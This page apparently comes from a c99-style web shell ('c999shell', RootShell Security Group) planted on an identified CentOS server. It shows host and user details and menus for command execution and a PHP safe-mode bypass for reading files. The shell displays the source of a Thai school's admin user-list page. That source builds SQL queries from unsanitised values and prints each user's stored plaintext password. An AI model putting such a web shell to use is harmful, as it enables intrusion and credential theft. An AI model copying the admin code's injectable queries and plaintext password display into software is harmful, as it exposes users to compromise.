Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/admin/ drwxr-xr-x | |
| Viewing file: Select action/file-type: <?php
session_start();
if (session_is_registered("valid_user"))
{
include("../include/FunctionDB.php");
include("../include/Function.php");
include("admin_menu.php");
ConnectDB();
$sql11 = "Select * From user_tb ";
$result11 = mysql_query($sql11) or die("Error".mysql_error());
$rss = mysql_fetch_array($result11);
$strSQL = "SELECT * FROM personal_tb Where permision='2' Order By Teacher_id ASC ";
if (! $Page)
$Page = 1;
$Pre_Page = $Page - 1;
$Next_Page = $Page +1;
$Per_Page = 50;
$result = mysql_query($strSQL);
$Page_start = ($Per_Page*$Page) - $Per_Page;
$Num_Rows = mysql_num_rows($result);
if( $Num_Rows <= $Per_Page)
$Num_Pages = 1;
else if (($Num_Rows % $Per_Page) == 0)
$Num_Pages = ($Num_Rows / $Per_Page);
else
$Num_Pages = ($Num_Rows / $Per_Page) + 1;
$Num_Pages = (int)$Num_Pages;
if (( $Page > $Num_Pages) || ($Page < 0))
echo"Page $Page More than $Num_Pages";
$strSQL .=" LIMIT $Page_start,$Per_Page" ;
$result = mysql_query($strSQL);
$num = mysql_num_rows( $result );
//$count = 0;
?>
<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
<script type="text/JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
//-->
</script>
<style type="text/css">
<!--
.style1 {
font-size: 14px;
font-weight: bold;
}
-->
</style>
<table width="814" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="814"><br>
<fieldset>
<legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="menu_admin.php" >หน้าหลัก</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"><a href="adduser.php">เพิ่มข้อมูลผู้ใช้ระบบ</a><img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /><a href="UserList.php">ข้อมูลการเข้าระบบ</a><img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /><a href="PermisionList.php">แสดงระดับการใช้งาน</a><img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" />เมนูข้อมูลผู้ใช้งาน</font></legend>
<form id="form1" name="form1" method="post" action="Deluser.php">
<p align="left"><font size="2" face="Tahoma"><img src="../picture/previous.gif" onclick="window.history.back()" width="85" height="22" border="0" /></font></p>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#EEEEEE" style="border:0px solid gray">
<tr bordercolor="#003366" bgcolor="#ABE4AF">
<td colspan="9" align="center" bgcolor="#FFFFFF"><span class="style1"><font color="#000000" face="Tahoma">รายชื่อผู้ใช้ทั้งหมด</font></span></td>
</tr>
<tr bordercolor="#003366" bgcolor="#E2F5E3">
<td width="20" align="center"><span class="style1"><font color="#FF0000" face="Tahoma">ลบ</font></span></td>
<td width="26" align="center"><span class="style1"><font color="#003366" face="Tahoma">No.</font></span></td>
<td width="215" align="center"><span class="style1"><font color="#003366" face="Tahoma">ชื่อ
- นามสกุล</font></span></td>
<td width="86" align="center"><span class="style1"><font color="#003366" face="Tahoma">username</font></span></td>
<td colspan="2" align="center" bgcolor="#E2F5E3"><span class="style1"><font color="#003366" face="Tahoma">password</font></span></td>
<td width="161" align="center"><span class="style1"><font color="#003366" face="Tahoma">Priority</font></span></td>
<td width="150" align="center"><span class="style1"><font color="#003366" face="Tahoma">สถานะการเข้าใช้ระบบ</font></span></td>
<td width="45" align="center"><span class="style1"><font color="#FF0000" face="Tahoma">ลบ</font></span></td>
</tr>
<?php
$i = 1;
while($row = mysql_fetch_array($result))
{
if($count==0)
{
?>
<tr bgcolor="#F7F7F7" >
<td align="center" bordercolor="#D1D1D1" ><div align="center">
<input name="checkbox[]" type="checkbox" id="checkbox[]" value="<? echo $row[Teacher_code]?>" />
</div></td>
<td align="center" bordercolor="#D1D1D1" ><strong><font color="#003300" size="2" face="Tahoma">
<?=$i?>
</font></strong></td>
<td align="center" bordercolor="#DFDFDF" ><div align="left">
<?php
$Flag = $row["Flag_del"];
if ($Flag == "1")
{
echo"<font color=\"#FF0000\" size=\"2\" face=\"Tahoma\">";
echo"$row[First_name] $row[Teacher_name] $row[Teacher_lastname]";
echo"</font>";
}
else
{
echo"<font color=\"#003300\" size=\"2\" face=\"Tahoma\">";
echo"$row[First_name] $row[Teacher_name] $row[Teacher_lastname]";
echo"</font>";
}
?>
</font> </div></td>
<td align="center" bordercolor="#DFDFDF" ><div align="left"><font color="#003300" size="2" face="Tahoma"> <? echo"$row[Username]";?> </font></div></td>
<td width="71" bordercolor="#DFDFDF"><div align="center" onclick="MM_openBrWindow('FrmEditPwd.php?Teacher_code=<? echo $row[Teacher_code]?>&Username=<? echo $row[Username]?>','Detail','width=400,height=150')"><a href="#"><img src="../Image/edit.gif" width="15" height="12" border="0" align="absmiddle" /></a></div></td>
<td width="28" bordercolor="#DFDFDF"><div align="left"><font color="#000000" size="2" face="Tahoma">
<?php
$Teacher_code= $row["Teacher_code"];
$sql2 = "Select * From user_tb Where Teacher_code='$Teacher_code'";
$result2= mysql_query($sql2) or die("Error".mysql_error());
$rss2 = mysql_fetch_array($result2);
echo "$rss2[PasswordR]";
?>
</font></div></td>
<td bordercolor="#DFDFDF"><div align="center"><font color="#000000" size="2" face="Tahoma">
<?php
$Permision = $row["Permision"] ;
$sql1 = "Select * From permission_tb Where permision='$Permision'";
$result1 = mysql_query($sql1) or die("Error".mysql_error());
$rss = mysql_fetch_array($result1);
echo "$rss[description]";
?>
</font><font color="#003300" size="2" face="Tahoma"><? echo"$row[Flag_del]";?></font><font color="#000000" size="2" face="Tahoma"> </font></div></td>
<td bordercolor="#DFDFDF"><div align="center"> <font size="2" face="Tahoma"> <a href="UpdatePermit.php?Teacher_code=<? echo $row[Teacher_code]?>&&Flag=<? echo $rss2[Flag]?>" class="d" >
<?php
$Teacher_code = $row["Teacher_code"];
$str = "Select * From user_tb Where Teacher_code='$Teacher_code'";
$res_p = mysql_query($str) or die("Error".mysql_error());
$res1 = mysql_fetch_array($res_p);
if ( !(strcmp("$res1[Flag]","0")) ) {
echo"<img src=\"../Image/unlock.gif\" width=\"13\" height=\"11\" align=\"absmiddle\" border=\"0\"> <font face=\"Tahoma\" size=\"2\" color=\"#0000FF\">อนุญาต</font>";
}
else if ( !(strcmp("$res1[Flag]","1")) ) {
echo"<img src=\"../Image/unlock.gif\" width=\"13\" height=\"11\" align=\"absmiddle\" border=\"0\"><font face=\"Tahoma\" size=\"2\" color=\"#0000FF\">อนุญาต</font>";
}
else if ( !(strcmp("$res1[Flag]","2")) ) {
echo"<img src=\"../Image/lock.gif\" width=\"10\" height=\"10\" align=\"absmiddle\" border=\"0\">ไม่อนุญาต";
}
?>
</a> </font></div></td>
<td bordercolor="#DFDFDF"><div align="center">
<script language="JavaScript" type="text/javascript">
function Conf<?=$row[Teacher_code];?>0(object) {
if (confirm("คุณต้องการลบข้อมูล [<?php echo " $row[Teacher_code] $row[Teacher_name] $row[Teacher_lastname]"; ?>] หรือไม่?") == true) {
return true;
}
return false;
}
</script>
<a href="Deluser2.php?Teacher_code=<?php echo $row[Teacher_code]; ?>"> <img src="../Image/del.gif" alt="Delete" width="11" height="12" border="0" onclick="return Conf<?=$row[Teacher_code];?>0(this)" /></a></div></td>
</tr>
<?
$count=1;
}
else
{
?>
<tr bgcolor="#FFFFFF">
<td align="center" bordercolor="#D1D1D1" ><div align="center">
<input name="checkbox[]2" type="checkbox" id="checkbox[]" value="<? echo $row[Teacher_code]?>" />
</div></td>
<td align="center" bordercolor="#D1D1D1" ><strong><font color="#003300" size="2" face="Tahoma">
<?=$i?>
</font></strong></td>
<td align="center" bordercolor="#FFFFFF" ><div align="left">
<?php
$Flag = $row[Flag_del];
if (Flag == "1")
{
echo"<font color=\"#FF0000\" size=\"2\" face=\"Tahoma\">";
echo"$row[First_name] $row[Teacher_name] $row[Teacher_lastname]";
echo"</font>";
}
else
{
echo"<font color=\"#003300\" size=\"2\" face=\"Tahoma\">";
echo"$row[First_name] $row[Teacher_name] $row[Teacher_lastname]";
echo"</font>";
}
?>
</div></td>
<td height="18" align="center" bordercolor="#FFFFFF" ><div align="left"><font color="#003300" size="2" face="Tahoma"> <? echo"$row[Username]";?> </font></div></td>
<td bordercolor="#FFFFFF" onclick="MM_openBrWindow('FrmEditPwd.php?Teacher_code=<? echo $row[Teacher_code]?>&Username=<? echo $row[Username]?>','Detail','width=400,height=150')"><div align="center" ><a href="#"><img src="../Image/edit.gif" width="15" height="12" border="0" align="absmiddle" /></a></div></td>
<td bordercolor="#FFFFFF"><div align="left"><font color="#000000" size="2" face="Tahoma">
<?php
$Teacher_code= $row[Teacher_code];
$sql2 = "Select * From user_tb Where Teacher_code='$Teacher_code'";
$result2= mysql_query($sql2) or die("Error".mysql_error());
$rss2 = mysql_fetch_array($result2);
echo "$rss2[PasswordR]";
?>
</font></div></td>
<td bordercolor="#FFFFFF"><div align="center"><font color="#000000" size="2" face="Tahoma">
<?php
$Permision = $row[Permision] ;
$sql1 = "Select * From permission_tb Where permision='$Permision'";
$result1 = mysql_query($sql1) or die("Error".mysql_error());
$rss = mysql_fetch_array($result1);
echo "$rss[description]";
?>
</font><font color="#003300" size="2" face="Tahoma"><? echo"$row[Flag_del]";?></font><font color="#000000" size="2" face="Tahoma"> </font></div></td>
<td bordercolor="#FFFFFF"><div align="center"> <font size="2" face="Tahoma"> <a href="UpdatePermit.php?Teacher_code=<? echo $row[Teacher_code]?>&&Flag=<? echo $rss2[Flag]?>" class="d" >
<?php
$Teacher_code = $row[Teacher_code];
$str = "Select * From user_tb Where Teacher_code='$Teacher_code'";
$res_p = mysql_query($str) or die("Error".mysql_error());
$res1 = mysql_fetch_array($res_p);
if (!(strcmp("$res1[Flag]","0")))
{
echo"<img src=\"../Image/unlock.gif\" width=\"13\" height=\"11\" align=\"absmiddle\" border=\"0\"> <font face=\"Tahoma\" size=\"2\" color=\"#0000FF\">อนุญาต</font>";
}
else if (!(strcmp("$res1[Flag]","1")))
{
echo"<img src=\"../Image/unlock.gif\" width=\"13\" height=\"11\" align=\"absmiddle\" border=\"0\"><font face=\"Tahoma\" size=\"2\" color=\"#0000FF\">อนุญาต</font>";
}
else if (!(strcmp("$res1[Flag]","2")))
{
echo"<img src=\"../Image/lock.gif\" width=\"10\" height=\"10\" align=\"absmiddle\" border=\"0\">ไม่อนุญาต";
}
?>
</a><a href="UpdatePermit.php?Teacher_code=<? echo $row[Teacher_code]?>&&Flag_del=<? echo $row[Flag_del]?>" class="d" > </a><a href="UpdatePermit.php?Teacher_code=<? echo $row[Teacher_code]?>" > </a> </font></div></td>
<td bordercolor="#FFFFFF"><div align="center">
<script language="JavaScript" type="text/javascript">
function Conf<?=$row[Teacher_code];?>0(object) {
if (confirm("คุณต้องการลบข้อมูล [<?php echo " $row[Teacher_code] $row[Teacher_name] $row[Teacher_lastname]"; ?>] หรือไม่?") == true) {
return true;
}
return false;
}
</script>
<a href="Deluser2.php?Teacher_code=<?php echo $row[Teacher_code]; ?>"> <img src="../Image/del.gif" alt="Delete" width="11" height="12" border="0" onclick="return Conf<?=$row[Teacher_code];?>0(this)" /></a></div></td>
</tr>
<?
$count=0;
}
$i++;
}
CloseDB();
?>
<tr bgcolor="#E2F5E3">
<td colspan="9" align="center"><input type="submit" name="Submit" value=" ลบ " /></td>
</tr>
<tr bgcolor="#ABE4AF">
<td colspan="9" align="center" bgcolor="#FFFFFF"><div align="center"><font color="#000000" size="2" face="Tahoma">ทั้งหมด</font><font color="#003399" size="2" face="Tahoma"> <? echo $num ?> </font><font color="#000000" size="2" face="Tahoma">รายการ </font> </div></td>
</tr>
</table>
</form>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#99CCFF">
<tr>
<td align="right" class="Tahoma11"><div align="center"><font color="#FFFFFF"> <font color="#FFFFFF" size="3" face="MS Sans Serif"><strong> <font color="#0033CC" size="2" face="Tahoma"> <?php echo $Num_Pages;?></font></strong></font><font color="#0033CC" size="2" face="Tahoma"><strong> หน้า</strong></font> <font color="#0033CC" size="2" face="Tahoma"><strong>
<?php
if ($Pre_Page)
echo"<a href=\"$PHP_SELF?Page=$Pre_Page\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b><< Previus</b> </font></a>";
for($i=1;$i<=$Num_Pages;$i++)
{
if($i != $Page)
echo" [<a href=\"$PHP_SELF?Page=$i\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b>$i</b></font></a>] ";
else
echo"<b>$i</b>";
}
if($Page != $Num_Pages)
echo"<a href=\"$PHP_SELF?Page=$Next_Page\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b> Next >></b> </font></a>";
?>
</strong></font> </font> </div></td>
</tr>
</table>
</fieldset><br>
<font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>หมายเหตุ :</b> ใช้เมาส์คลิก<br>
</font></td>
</tr>
</table>
<?php
}
else
{
echo"<body bgcolor=\"#CCCCCC\">";
echo"<meta http-equiv=\"refresh\" content=\"3;URL=../logout.php\" target=\"mainFrame\">\n";
echo"<center>";
echo"<br><br><br><b><font face=\"Tahoma\" size=\"4\" color=\"#FF0000\">Please Login</font> </b><br>";
echo"<br><br><font face=\"Tahoma\" size=\"10\" color=\"#000000\"> ERROR 404 PERMISION DENY</font><br>";
echo"<br><font face=\"Tahoma\" size=\"4\" color=\"#000000\"> คุณไม่มีสิทธ์ใช้งาน</font>";
echo"</center>";
echo"</body>";
}
?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]-- |